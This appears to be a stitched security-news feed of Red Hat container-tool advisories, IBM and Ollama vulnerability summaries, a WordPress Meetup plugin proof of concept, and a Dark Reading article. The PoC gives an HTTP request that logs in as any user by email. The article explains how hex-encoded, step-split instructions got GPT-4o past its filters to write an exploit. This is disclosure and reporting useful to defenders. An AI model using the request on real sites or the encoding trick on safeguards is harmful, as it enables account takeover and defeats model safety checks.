Red Hat Security Advisory 2024-9097-03 - An update for buildah is now available for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9097.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: buildah security updateAdvisory ID:        RHSA-2024:9097-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9097Issue date:         2024-11-12Revision:           03CVE Names:          CVE-2024-3727====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* containers/image: digest type does not guarantee valid type (CVE-2024-3727)* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 9.5 Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-3727References:https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/9/html/9.5_release_notes/indexhttps://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2274767https://bugzilla.redhat.com/show_bug.cgi?id=2295310https://issues.redhat.com/browse/RHEL-29278https://issues.redhat.com/browse/RHEL-40808

Red Hat Security Advisory 2024-9097-03

Red Hat Security Advisory 2024-9051-03 - An update for podman is now available for Red Hat Enterprise Linux 9. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9051.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: podman security updateAdvisory ID:        RHSA-2024:9051-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9051Issue date:         2024-11-12Revision:           03CVE Names:          CVE-2024-9407====================================================================Summary: An update for podman is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.Security Fix(es):* Buildah: Podman: Improper Input Validation in bind-propagation Option of Dockerfile RUN --mount Instruction (CVE-2024-9407)* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)* Podman: Buildah: CRI-O: symlink traversal vulnerability in the containers/storage library can cause Denial of Service (DoS) (CVE-2024-9676)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9407References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315887https://bugzilla.redhat.com/show_bug.cgi?id=2317458https://bugzilla.redhat.com/show_bug.cgi?id=2317467

Red Hat Security Advisory 2024-9051-03

WordPress Meetup plugin versions 0.1 and below suffer from an authentication bypass vulnerability.

    # CVE-2024-50483Meetup <= 0.1 - Authentication Bypass via Account Takeover# Description:The Meetup plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 0.1. This is due to the plugin not properly verifying a user's identity prior to authenticating them via the facebook_register() function. This makes it possible for unauthenticated attackers to log in as any user, granted they know their email address.```CVE: CVE-2024-50483CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS Score: 9.8Slugs: meetup```Note: You need to know the users email address you want to login as.POC---```POST /wp-admin/admin-ajax.php HTTP/1.1Host: kubernetes.docker.internalContent-Type: application/x-www-form-urlencodedContent-Length: 149action=meetup_fb_register&email=admin@admin.com&first_name=Test&last_name=User&id=12345678901234567890&type=token&link=https://example.com/user/test/```Response--```HTTP/1.1 200 OKDate: Tue, 05 Nov 2024 21:37:23 GMTServer: Apache/2.4.57 (Debian)X-Powered-By: PHP/8.2.13X-Robots-Tag: noindexX-Content-Type-Options: nosniffExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Referrer-Policy: strict-origin-when-cross-originX-Frame-Options: SAMEORIGINSet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-content/plugins; HttpOnlySet-Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cb30fbbd9ddce680d1b3992fc121335abfede4d30ed0ddfea33cab3c7a9c800dd; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/wp-admin; HttpOnlySet-Cookie: wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1732052243%7Cip8EqMGbc9Iect9L7RPRWfDKjucVdkdSKINkRz5VxrM%7Cecd2fbdf078b2f2b3735b5e423cfae0efa73526e26e17f3cd192896597c7b650; expires=Wed, 20 Nov 2024 09:37:23 GMT; Max-Age=1252800; path=/; HttpOnlyContent-Length: 0Content-Type: text/html; charset=UTF-8```

WordPress Meetup 0.1 Authentication Bypass

Red Hat Security Advisory 2024-8846-03 - An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8846.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: container-tools:rhel8 security updateAdvisory ID:        RHSA-2024:8846-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8846Issue date:         2024-11-05Revision:           03CVE Names:          CVE-2024-9341====================================================================Summary: An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* Podman: Buildah: cri-o: FIPS Crypto-Policy Directory Mounting Issue in containers/common Go Library (CVE-2024-9341)* Buildah: Podman: Improper Input Validation in bind-propagation Option of Dockerfile RUN --mount Instruction (CVE-2024-9407)* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9341References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2315691https://bugzilla.redhat.com/show_bug.cgi?id=2315887https://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8846-03

IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.

IBM Security Verify Access 32 Vulnerabilities

IBM Security Verify Access Appliance suffers from multiple insecure transit vulnerabilities, hardcoded passwords, and uninitialized variables. ibmsecurity versions prior to 2024.4.5 are affected.

IBM Security Verify Access Appliance Insecure Transit / Hardcoded Passwords

Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft.
"Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including

Vulnerability / Cyber Threat

Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft.

"Collectively, the vulnerabilities could allow an attacker to carry out a wide-range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more," Oligo Security researcher Avi Lumelsky said in a report published last week.

Ollama is an open-source application that allows users to deploy and operate large language models (LLMs) locally on Windows, Linux, and macOS devices. Its project repository on GitHub has been forked 7,600 times to date.

A brief description of the six vulnerabilities is below -

*   **CVE-2024-39719** (CVSS score: 7.5) - A vulnerability that an attacker can exploit using /api/create an endpoint to determine the existence of a file in the server (Fixed in version 0.1.47)
*   **CVE-2024-39720** (CVSS score: 8.2) - An out-of-bounds read vulnerability that could cause the application to crash by means of the /api/create endpoint, resulting in a DoS condition (Fixed in version 0.1.46)
*   **CVE-2024-39721** (CVSS score: 7.5) - A vulnerability that causes resource exhaustion and ultimately a DoS when invoking the /api/create endpoint repeatedly when passing the file "/dev/random" as input (Fixed in version 0.1.34)
*   **CVE-2024-39722** (CVSS score: 7.5) - A path traversal vulnerability in the api/push endpoint that exposes the files existing on the server and the entire directory structure on which Ollama is deployed (Fixed in version 0.1.46)
*   A vulnerability that could lead to model poisoning via the /api/pull endpoint from an untrusted source (No CVE identifier, Unpatched)
*   A vulnerability that could lead to model theft via the /api/push endpoint to an untrusted target (No CVE identifier, Unpatched)

For both unresolved vulnerabilities, the maintainers of Ollama have recommended that users filter which endpoints are exposed to the internet by means of a proxy or a web application firewall.

"Meaning that, by default, not all endpoints should be exposed," Lumelsky said. "That's a dangerous assumption. Not everybody is aware of that, or filters http routing to Ollama. Currently, these endpoints are available through the default port of Ollama as part of every deployment, without any separation or documentation to back it up."

Oligo said it found 9,831 unique internet-facing instances that run Ollama, with a majority of them located in China, the U.S., Germany, South Korea, Taiwan, France, the U.K., India, Singapore, and Hong Kong. One out of four internet-facing servers has been deemed vulnerable to the identified flaws.

The development comes more than four months after cloud security firm Wiz disclosed a severe flaw impacting Ollama (CVE-2024-37032) that could have been exploited to achieve remote code execution.

"Exposing Ollama to the internet without authorization is the equivalent to exposing the docker socket to the public internet, because it can upload files and has model pull and push capabilities (that can be abused by attackers)," Lumelsky noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaws in Ollama AI Framework Could Enable DoS, Model Theft, and Poisoning

Red Hat Security Advisory 2024-8675-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8675.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: buildah security updateAdvisory ID:        RHSA-2024:8675-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8675Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9675====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9675References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8675-03

Red Hat Security Advisory 2024-8563-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8563.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: buildah security updateAdvisory ID:        RHSA-2024:8563-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8563Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9675====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9675References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8563-03

LLMs tend to miss the forest for the trees, understanding specific instructions but not their broader context. Bad actors can take advantage of this myopia to get them to do malicious things, with a new prompt-injection technique.

Source: Igor Stevanovic via Alamy Stock Photo

A new prompt-injection technique could allow anyone to bypass the safety guardrails in OpenAI's most advanced language learning model (LLM).

GPT-4o, released May 13, is faster, more efficient, and more multifunctional than any of the previous models underpinning ChatGPT. It can process multiple different forms of input data in dozens of languages, then spit out a response in milliseconds. It can engage in real-time conversations, analyze live camera feeds, and maintain an understanding of context over extended conversations with users. When it comes to user-generated content management, however, GPT-4o is in some ways still archaic.

Marco Figueroa, generative AI (GenAI) bug-bounty programs manager at Mozilla, demonstrated in a new report how bad actors can leverage the power of GPT-4o while skipping over its guardrails. The key is to essentially distract the model by encoding malicious instructions in an unorthodox format, and spread them out in distinct steps.

**Tricking ChatGPT Into Writing Exploit Code**

To prevent malicious abuse, GPT-4o analyzes user inputs for any signs of bad language, instructions with ill intent, etc.

But at the end of the day, Figueroa says, "It's just word filters. That's what I've seen through experience, and we know exactly how to bypass these filters."

For example, he says, "We can modify how something's spelled out — break it up in certain ways — and the LLM interprets it." GPT-4o might not reject a malicious instruction if it's presented with a spelling or phrasing that doesn't accord with typical natural language.

Figuring out the exact right way to present information in order to dupe state-of-the-art AI, though, requires lots of creative brain power. It turns out that there's a much simpler method for bypassing GPT-4o's content filtering: encoding instructions in a format other than natural language.

To demonstrate, Figueroa arranged an experiment with the goal of getting ChatGPT to do something it otherwise shouldn't: write exploit code for a software vulnerability. He picked CVE-2024-41110, a bypass for authorization plug-ins in Docker that earned a "critical" 9.9 out of 10 rating in the Common Vulnerability Scoring System (CVSS) this summer.

To trick the model, he encoded his malicious input in hexadecimal format, and provided a set of instructions for decoding it. GPT-4o took that input — a long series of digits and letters A through F — and followed those instructions, ultimately decoding the message as an instruction to research CVE-2024-41110 and write a Python exploit for it. To make it less likely that the program would make a fuss over that instruction, he used some leet speak, asking for an "3xploit," instead of an "exploit."

Source: Mozilla

In a minute flat, ChatGPT generated a working exploit similar to, but not exactly like, another PoC already published to GitHub. Then, as a bonus, it attempted to execute the code against itself. "There wasn't any instruction that specifically said to execute it. I just wanted to print it out. I didn't even know why it went ahead and did that," Figueroa says.

**What's Missing in GPT-4o?**

It's not just that GPT-4o is getting distracted by decoding, according to Figueroa, but that it's in some sense missing the forest for the trees — a phenomenon that has been documented in other prompt-injection techniques lately.

"The language model is designed to follow instructions step-by-step, but lacks deep context awareness to evaluate the safety of each individual step in the broader context of its ultimate goal," he wrote in the report. The model analyzes each input — which, on its own, doesn't immediately read as harmful — but not what the inputs produce in sum. Rather than stop and think about how instruction one bears on instruction two, it just charges ahead.

"This compartmentalized execution of tasks allows attackers to exploit the model's efficiency at following instructions without deeper analysis of the overall outcome," according to Figueroa.

If this is the case, ChatGPT will not only need to improve how it handles encoded information but also develop a kind of broader context around instructions split into distinct steps.

To Figueroa, though, OpenAI appears to have been valuing innovation at the cost of security when developing its programs. "To me, they don't care. It just feels like that," he says. By contrast, he's had much more trouble trying the same jailbreaking tactics against models by Anthropic, another prominent AI company founded by former OpenAI employees. "Anthropic has the strongest security because they have built both a prompt firewall \[for analyzing inputs\] and response filter \[for analyzing outputs\], so this becomes 10 times more difficult," he explains.

Dark Reading is awaiting comment from OpenAI on this story.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#docker